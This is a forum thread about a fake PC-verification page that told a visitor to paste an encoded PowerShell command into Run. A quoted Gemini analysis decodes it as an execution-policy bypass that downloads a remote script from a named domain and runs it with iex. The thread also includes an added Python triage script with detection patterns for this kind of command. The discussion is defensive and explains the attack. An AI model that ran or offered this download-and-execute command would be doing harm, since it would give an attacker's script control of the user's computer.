this post was submitted on 23 Jun 2025
17 points (90.5% liked)

Windows 11


Yeah, don't put this in, but can anyone give me an idea of what they were trying to do? The website was https:\howchoo.\com\3dprinting\updating-octoprint
and it used a real PC verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

[–] Pyro@pawb.social 9 points 2 weeks ago* (last edited 2 weeks ago) (18 children)

One of the moments that AI can be good. I asked Google Gemini:

This command is highly malicious and is designed to execute a script downloaded from a remote server. Here's a breakdown of what each part does:

  • conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it's being used as a wrapper.
  • powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
    • powershell: Invokes the PowerShell interpreter.
    • /ep bypass: This is crucial. /ep stands for "execution policy." bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
    • /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let's decode the Base64 string to see the actual PowerShell command.

  Decoded PowerShell command: $site = Invoke-RestMethod 'https: //mastraw.top/me/day'; iex $site

  Now we can fully understand the malicious intent:
  • $site = Invoke-RestMethod '# https: //mastraw.top/me/day': This command uses Invoke-RestMethod to download content from the URL 'https://mastraw/. top/me/day'. This URL is likely hosting a malicious PowerShell script or some other form of executable code.
  • ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from 'https://mastraw.top/. /me/day' (which is stored in the $site variable) and executes it directly as a PowerShell command.

  In summary, this command is designed to:
  • Bypass PowerShell's security restrictions.
  • Download a script from a specific remote website '(https. ://mastraw.top/me/day)'.
  • Immediately execute that downloaded script on the victim's computer.

  The content of the script downloaded from 'https :// mastraw.top/me/day' is unknown without accessing that URL, but given the nature of this command, it's almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

Edit: added back ticks to URLs
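
Worked example, added here and not part of the post or of Gemini's output: a small Python triage script that does what the breakdown above describes by hand. It pulls the /e payload out of a command line, decodes it as Base64 over UTF-16LE (the encoding PowerShell's -EncodedCommand expects), copes with a truncated paste like the one in the original post, and flags the execution-policy bypass plus the download-and-execute pattern. The sample command line is constructed with a placeholder domain, not the one from the post.

```python
"""Decode and triage a PowerShell encoded command line (added example)."""
import base64
import binascii
import re

# Indicators a defender looks for in the decoded script: (regex, label).
INDICATORS = [
    (r"\biex\b|Invoke-Expression", "executes downloaded text (iex / Invoke-Expression)"),
    (r"Invoke-RestMethod|Invoke-WebRequest|DownloadString|\b(?:irm|iwr)\b",
     "fetches content from a remote URL"),
    (r"https?://[^\s'\"]+", "contains a URL"),
]


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is Base64 over UTF-16LE text. If the string was cut off
    when copied (as in the original post), decode the intact prefix instead."""
    cleaned = re.sub(r"\s+", "", b64)
    try:
        raw = base64.b64decode(cleaned + "=" * (-len(cleaned) % 4), validate=True)
    except binascii.Error:
        body = cleaned.rstrip("=")
        raw = base64.b64decode(body[: len(body) // 4 * 4])
    return raw.decode("utf-16-le", errors="ignore")


def triage_command_line(cmdline: str) -> dict:
    """Return the decoded script, matched indicators and a verdict."""
    findings = []
    if re.search(r"(?i)[-/]e(?:p|xecutionpolicy)\s+bypass", cmdline):
        findings.append("execution policy bypass on the command line")
    # -e, -ec, -enc, -EncodedCommand (PowerShell accepts unambiguous prefixes).
    m = re.search(r"(?i)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", cmdline)
    decoded = decode_encoded_command(m.group(1)) if m else ""
    for pattern, label in INDICATORS:
        if re.search(pattern, decoded, re.IGNORECASE):
            findings.append(label)
    # Fetching remote text and handing it to iex is the download-and-execute hallmark.
    fetches = any(f.startswith("fetches") for f in findings)
    executes = any(f.startswith("executes") for f in findings)
    verdict = "malicious" if fetches and executes else "review"
    return {"decoded": decoded, "findings": findings, "verdict": verdict}


def encode_for_powershell(script: str) -> str:
    """Used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: same shape as the post's command, placeholder domain.
SAMPLE_SCRIPT = "$site = Invoke-RestMethod 'https://example.invalid/stage'; iex $site"
SAMPLE_CMDLINE = ("conhost cmd /c powershell /ep bypass /e "
                  + encode_for_powershell(SAMPLE_SCRIPT) + " /W 1")

if __name__ == "__main__":
    print(triage_command_line(SAMPLE_CMDLINE))
```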

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (14 children)

You needed an LLM to figure out this was malware?! Sweet Jesus, we're well and truly fucked.

[–] otter@lemmy.ca 3 points 2 weeks ago* (last edited 2 weeks ago) (4 children)

It did speed up the process of looking it up and confirming that it is malware.

LLMs are decent at pattern recognition, and so it pulled up relevant keywords associated with each part of the command. You can then look up the important section to verify. It's also something that a simple and locally hosted LLM could do.

I wouldn't run a random command, but confirming that it is malware would let me take further action to block the site / report it / help a family member that already ran the command.

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (1 children)

Or you can just know that if some rando site is asking you to run cmd and powershell as some sort of authentication scheme, you're about to get your shit fucked up. The specifics literally don't matter, this is behavior no legit site would request you to do.

[–] otter@lemmy.ca 4 points 2 weeks ago (1 children)

That's enough for me to not run it, but proving it can be helpful in some contexts, such as this thread.

"This is malware because no legit site would authenticate like that" vs. "this is malware, it will do XYZ"

[–] geekwithsoul@lemm.ee 0 points 2 weeks ago* (last edited 2 weeks ago) (1 children)

Okay but pretty much any malware is going to follow those same steps - they're what makes it malware. The LLM doesn't "prove" anything - it's not examining the executable, it's not setting up a VM and doing deep packet analysis to see how the malware operates. It's just parroting back the fact this is malware with details seeded from the prompt. This is like yelling into a canyon and "proving" someone is stuck in the canyon and yelling because you heard an echo.

No one should be using an LLM as a security backstop. It's only going to catch the things that have already been seen before, and the minute a bad actor introduces something the least bit novel in the attack, the LLM is confidently going to say it isn't malware because it hasn't seen it before. A simple web search would have turned up essentially the same information and used only a small fraction of the resources.

[–] otter@lemmy.ca 4 points 2 weeks ago

That's not what I meant, though; I said that it speeds up the process of looking it up. It's about as good as an unreliable peer that tells you what it thinks is happening. I can then research it myself based on the keywords that it mentions.

It is similar to a web search, but with how bad search results are these days (a large part because of other people making LLM generated garbage articles), I find that asking a locally hosted LLM will give me a better starting point. Since it's running on my own simple hardware, I'm not as worried about the resource cost compared to the tech companies' ones.

I agree with everything else you've said though.
